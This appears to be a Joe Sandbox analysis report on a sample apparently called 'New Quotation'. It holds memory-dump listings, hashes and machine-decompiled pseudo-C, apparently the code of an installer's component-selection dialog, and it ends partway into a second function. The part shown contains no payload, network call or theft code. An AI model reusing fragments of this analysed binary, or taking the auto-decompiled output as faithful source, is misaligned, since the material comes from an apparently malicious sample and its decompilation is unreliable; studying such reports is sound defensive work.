                                                                                                                                                                                          0x0040784b
                                                                                                                                                                                          0x00407854
                                                                                                                                                                                          0x0040785d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040785d
                                                                                                                                                                                          0x0040786a
                                                                                                                                                                                          0x0040786a
                                                                                                                                                                                          0x0040786d
                                                                                                                                                                                          0x00407874
                                                                                                                                                                                          0x00407877
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040769a
                                                                                                                                                                                          0x0040761a
                                                                                                                                                                                          0x0040761c
                                                                                                                                                                                          0x0040761c
                                                                                                                                                                                          0x00407620
                                                                                                                                                                                          0x00407623
                                                                                                                                                                                          0x00407624
                                                                                                                                                                                          0x00407624
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040761c
                                                                                                                                                                                          0x00407590
                                                                                                                                                                                          0x00407596
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                                                                                                          • Instruction ID: 4d3fc1c80ea15bf86cc2801d6424e98614acddb7a54358772128df9d71e60e61
                                                                                                                                                                                          • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                                                                                                          • Instruction Fuzzy Hash: C6C14871E042599BCF18CF68C8905EEBBB2BF88314F25866AD85677380D7347941CF95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00404F06 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                          			E00404F06(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				intOrPtr _t202;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x434f28;
				_v28 =  *0x434f10 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x434f19 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404E54(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x434f18) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x42d24c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x42d260;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x42d24c = 0;
								 *0x42d260 = 0;
								 *0x434f60 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x434f19 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404ED4();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x42d260;
									_t201 =  *0x434f28;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x434f2c <= 0) {
										L86:
										if( *0x434fbe == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										_t202 =  *0x433edc; // 0x6252da
										if( *((intOrPtr*)(_t202 + 0x10)) != 0) {
											E00404E0F(0x3ff, 0xfffffffb, E00404E27(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x434f2c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x42d260);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x434f60 = _t291;
					 *0x42d260 = GlobalAlloc(0x40,  *0x434f2c << 2);
					_t258 = LoadImageW( *0x434f00, 0x6e, 0, 0, 0, 0);
					 *0x42d254 =  *0x42d254 | 0xffffffff;
					_t297 = _t258;
					 *0x42d25c = SetWindowLongW(_v8, 0xfffffffc, E00405513);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42d24c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42d24c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E0040657A(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E00404499(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E00404499(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x434f2c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x42d260 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x42d260 + _t300 * 4) = _t284;
									_v16 =  *( *0x42d260 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x434f2c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004044CE(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004044CE(_v12);
								L93:
								return E00404500(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}



























































                                                                                                                                                                                          0x00404f0d
                                                                                                                                                                                          0x00404f26
                                                                                                                                                                                          0x00404f2b
                                                                                                                                                                                          0x00404f33
                                                                                                                                                                                          0x00404f39
                                                                                                                                                                                          0x00404f4f
                                                                                                                                                                                          0x00404f52
                                                                                                                                                                                          0x0040517d
                                                                                                                                                                                          0x00405184
                                                                                                                                                                                          0x00405198
                                                                                                                                                                                          0x00405186
                                                                                                                                                                                          0x00405188
                                                                                                                                                                                          0x0040518b
                                                                                                                                                                                          0x0040518c
                                                                                                                                                                                          0x00405193
                                                                                                                                                                                          0x00405193
                                                                                                                                                                                          0x004051a4
                                                                                                                                                                                          0x004051b2
                                                                                                                                                                                          0x004051b5
                                                                                                                                                                                          0x004051cb
                                                                                                                                                                                          0x00405240
                                                                                                                                                                                          0x00405243
                                                                                                                                                                                          0x00405245
                                                                                                                                                                                          0x0040524f
                                                                                                                                                                                          0x0040525d
                                                                                                                                                                                          0x0040525d
                                                                                                                                                                                          0x0040525f
                                                                                                                                                                                          0x00405269
                                                                                                                                                                                          0x0040526f
                                                                                                                                                                                          0x00405272
                                                                                                                                                                                          0x00405275
                                                                                                                                                                                          0x00405290
                                                                                                                                                                                          0x00405277
                                                                                                                                                                                          0x00405281
                                                                                                                                                                                          0x00405281
                                                                                                                                                                                          0x00405275
                                                                                                                                                                                          0x00405269
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405243
                                                                                                                                                                                          0x004051d0
                                                                                                                                                                                          0x004051db
                                                                                                                                                                                          0x004051e0
                                                                                                                                                                                          0x004051e7
                                                                                                                                                                                          0x004051ec
                                                                                                                                                                                          0x004051f0
                                                                                                                                                                                          0x004051fb
                                                                                                                                                                                          0x004051fb
                                                                                                                                                                                          0x004051ff
                                                                                                                                                                                          0x00405203
                                                                                                                                                                                          0x00405207
                                                                                                                                                                                          0x0040521a
                                                                                                                                                                                          0x00405209
                                                                                                                                                                                          0x00405209
                                                                                                                                                                                          0x00405210
                                                                                                                                                                                          0x00405216
                                                                                                                                                                                          0x00405212
                                                                                                                                                                                          0x00405212
                                                                                                                                                                                          0x00405212
                                                                                                                                                                                          0x00405210
                                                                                                                                                                                          0x0040521e
                                                                                                                                                                                          0x00405220
                                                                                                                                                                                          0x00405233
                                                                                                                                                                                          0x00405236
                                                                                                                                                                                          0x00405239
                                                                                                                                                                                          0x00405239
                                                                                                                                                                                          0x00405203
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004051f0
                                                                                                                                                                                          0x004051d2
                                                                                                                                                                                          0x004051d9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405293
                                                                                                                                                                                          0x00405293
                                                                                                                                                                                          0x0040529a
                                                                                                                                                                                          0x0040530b
                                                                                                                                                                                          0x00405313
                                                                                                                                                                                          0x0040531b
                                                                                                                                                                                          0x0040531b
                                                                                                                                                                                          0x00405324
                                                                                                                                                                                          0x00405326
                                                                                                                                                                                          0x0040532d
                                                                                                                                                                                          0x00405330
                                                                                                                                                                                          0x00405330
                                                                                                                                                                                          0x00405336
                                                                                                                                                                                          0x0040533d
                                                                                                                                                                                          0x00405340
                                                                                                                                                                                          0x00405340
                                                                                                                                                                                          0x00405346
                                                                                                                                                                                          0x0040534c
                                                                                                                                                                                          0x00405352
                                                                                                                                                                                          0x00405352
                                                                                                                                                                                          0x0040535f
                                                                                                                                                                                          0x004054c0
                                                                                                                                                                                          0x004054c7
                                                                                                                                                                                          0x004054e4
                                                                                                                                                                                          0x004054ea
                                                                                                                                                                                          0x004054fc
                                                                                                                                                                                          0x004054fc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405365
                                                                                                                                                                                          0x00405367
                                                                                                                                                                                          0x0040536c
                                                                                                                                                                                          0x00405371
                                                                                                                                                                                          0x00405376
                                                                                                                                                                                          0x00405378
                                                                                                                                                                                          0x00405378
                                                                                                                                                                                          0x00405379
                                                                                                                                                                                          0x0040537a
                                                                                                                                                                                          0x0040537c
                                                                                                                                                                                          0x0040537c
                                                                                                                                                                                          0x00405384
                                                                                                                                                                                          0x004053c5
                                                                                                                                                                                          0x004053c7
                                                                                                                                                                                          0x004053d7
                                                                                                                                                                                          0x004053da
                                                                                                                                                                                          0x004053df
                                                                                                                                                                                          0x004053e6
                                                                                                                                                                                          0x004053e9
                                                                                                                                                                                          0x0040548b
                                                                                                                                                                                          0x00405494
                                                                                                                                                                                          0x0040549c
                                                                                                                                                                                          0x0040549c
                                                                                                                                                                                          0x004054a2
                                                                                                                                                                                          0x004054aa
                                                                                                                                                                                          0x004054bb
                                                                                                                                                                                          0x004054bb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004054aa
                                                                                                                                                                                          0x004053ef
                                                                                                                                                                                          0x004053f2
                                                                                                                                                                                          0x004053f8
                                                                                                                                                                                          0x004053fd
                                                                                                                                                                                          0x004053ff
                                                                                                                                                                                          0x00405401
                                                                                                                                                                                          0x00405407
                                                                                                                                                                                          0x0040540e
                                                                                                                                                                                          0x00405413
                                                                                                                                                                                          0x0040541a
                                                                                                                                                                                          0x0040541d
                                                                                                                                                                                          0x0040541d
                                                                                                                                                                                          0x00405424
                                                                                                                                                                                          0x00405430
                                                                                                                                                                                          0x00405434
                                                                                                                                                                                          0x00405436
                                                                                                                                                                                          0x00405436
                                                                                                                                                                                          0x00405426
                                                                                                                                                                                          0x00405428
                                                                                                                                                                                          0x00405428
                                                                                                                                                                                          0x00405456
                                                                                                                                                                                          0x00405462
                                                                                                                                                                                          0x00405471
                                                                                                                                                                                          0x00405471
                                                                                                                                                                                          0x00405473
                                                                                                                                                                                          0x00405476
                                                                                                                                                                                          0x0040547f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405386
                                                                                                                                                                                          0x00405391
                                                                                                                                                                                          0x00405394
                                                                                                                                                                                          0x00405399
                                                                                                                                                                                          0x0040539b
                                                                                                                                                                                          0x0040539f
                                                                                                                                                                                          0x004053af
                                                                                                                                                                                          0x004053b9
                                                                                                                                                                                          0x004053bb
                                                                                                                                                                                          0x004053be
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004053a1
                                                                                                                                                                                          0x004053a1
                                                                                                                                                                                          0x004053a7
                                                                                                                                                                                          0x004053a9
                                                                                                                                                                                          0x004053a9
                                                                                                                                                                                          0x004053aa
                                                                                                                                                                                          0x004053ab
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004053a1
                                                                                                                                                                                          0x00405384
                                                                                                                                                                                          0x0040535f
                                                                                                                                                                                          0x004052a2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004052b8
                                                                                                                                                                                          0x004052c2
                                                                                                                                                                                          0x004052c7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004052d9
                                                                                                                                                                                          0x004052de
                                                                                                                                                                                          0x004052ea
                                                                                                                                                                                          0x004052ea
                                                                                                                                                                                          0x004052ec
                                                                                                                                                                                          0x004052fb
                                                                                                                                                                                          0x004052fd
                                                                                                                                                                                          0x00405301
                                                                                                                                                                                          0x00405304
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405304
                                                                                                                                                                                          0x004052a2
                                                                                                                                                                                          0x00404f58
                                                                                                                                                                                          0x00404f5d
                                                                                                                                                                                          0x00404f66
                                                                                                                                                                                          0x00404f6d
                                                                                                                                                                                          0x00404f7f
                                                                                                                                                                                          0x00404f8a
                                                                                                                                                                                          0x00404f90
                                                                                                                                                                                          0x00404f9e
                                                                                                                                                                                          0x00404fb2
                                                                                                                                                                                          0x00404fb7
                                                                                                                                                                                          0x00404fc4
                                                                                                                                                                                          0x00404fc9
                                                                                                                                                                                          0x00404fdf
                                                                                                                                                                                          0x00404ff0
                                                                                                                                                                                          0x00404ffd
                                                                                                                                                                                          0x00404ffd
                                                                                                                                                                                          0x00405000
                                                                                                                                                                                          0x00405006
                                                                                                                                                                                          0x00405008
                                                                                                                                                                                          0x0040500b
                                                                                                                                                                                          0x00405010
                                                                                                                                                                                          0x00405015
                                                                                                                                                                                          0x00405017
                                                                                                                                                                                          0x00405017
                                                                                                                                                                                          0x00405037
                                                                                                                                                                                          0x00405037
                                                                                                                                                                                          0x00405039
                                                                                                                                                                                          0x0040503a
                                                                                                                                                                                          0x0040503f
                                                                                                                                                                                          0x00405045
                                                                                                                                                                                          0x00405049
                                                                                                                                                                                          0x0040504e
                                                                                                                                                                                          0x00405056
                                                                                                                                                                                          0x0040505a
                                                                                                                                                                                          0x0040505f
                                                                                                                                                                                          0x00405064
                                                                                                                                                                                          0x0040506c
                                                                                                                                                                                          0x0040506f
                                                                                                                                                                                          0x0040513f
                                                                                                                                                                                          0x00405152
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405075
                                                                                                                                                                                          0x00405078
                                                                                                                                                                                          0x0040507b
                                                                                                                                                                                          0x0040507e
                                                                                                                                                                                          0x0040507e
                                                                                                                                                                                          0x00405084
                                                                                                                                                                                          0x0040508d
                                                                                                                                                                                          0x00405090
                                                                                                                                                                                          0x00405094
                                                                                                                                                                                          0x00405097
                                                                                                                                                                                          0x0040509a
                                                                                                                                                                                          0x004050a3
                                                                                                                                                                                          0x004050ac
                                                                                                                                                                                          0x004050af
                                                                                                                                                                                          0x004050b2
                                                                                                                                                                                          0x004050b5
                                                                                                                                                                                          0x004050f3
                                                                                                                                                                                          0x0040511e
                                                                                                                                                                                          0x004050f5
                                                                                                                                                                                          0x00405104
                                                                                                                                                                                          0x00405104
                                                                                                                                                                                          0x004050b7
                                                                                                                                                                                          0x004050ba
                                                                                                                                                                                          0x004050c8
                                                                                                                                                                                          0x004050d2
                                                                                                                                                                                          0x004050da
                                                                                                                                                                                          0x004050e1
                                                                                                                                                                                          0x004050ec
                                                                                                                                                                                          0x004050ec
                                                                                                                                                                                          0x004050b5
                                                                                                                                                                                          0x00405124
                                                                                                                                                                                          0x00405125
                                                                                                                                                                                          0x00405131
                                                                                                                                                                                          0x00405131
                                                                                                                                                                                          0x0040513d
                                                                                                                                                                                          0x00405158
                                                                                                                                                                                          0x0040515b
                                                                                                                                                                                          0x00405178
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040515d
                                                                                                                                                                                          0x00405162
                                                                                                                                                                                          0x0040516b
                                                                                                                                                                                          0x004054fe
                                                                                                                                                                                          0x00405510
                                                                                                                                                                                          0x00405510
                                                                                                                                                                                          0x0040515b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040513d
                                                                                                                                                                                          0x0040506f

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404F1E
                                                                                                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 00404F29
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
                                                                                                                                                                                          • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F8A
                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000FC,00405513), ref: 00404FA3
                                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
                                                                                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
                                                                                                                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
                                                                                                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
                                                                                                                                                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00405000
                                                                                                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                                                                                                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                                                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                                                                                                                                                                                            • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
                                                                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00405162
                                                                                                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
                                                                                                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
                                                                                                                                                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
                                                                                                                                                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
                                                                                                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00405330
                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00405340
                                                                                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
                                                                                                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00405462
                                                                                                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
                                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 004054EA
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 004054F5
                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 004054FC
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                          • String ID: $M$N
                                                                                                                                                                                          • API String ID: 2564846305-813528018
                                                                                                                                                                                          • Opcode ID: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                                                                                                                                                          • Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
                                                                                                                                                                                          • Opcode Fuzzy Hash: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                                                                                                                                                          • Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00404658 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                          			E00404658(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				intOrPtr _t69;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t111;
				intOrPtr _t113;
				WCHAR* _t114;
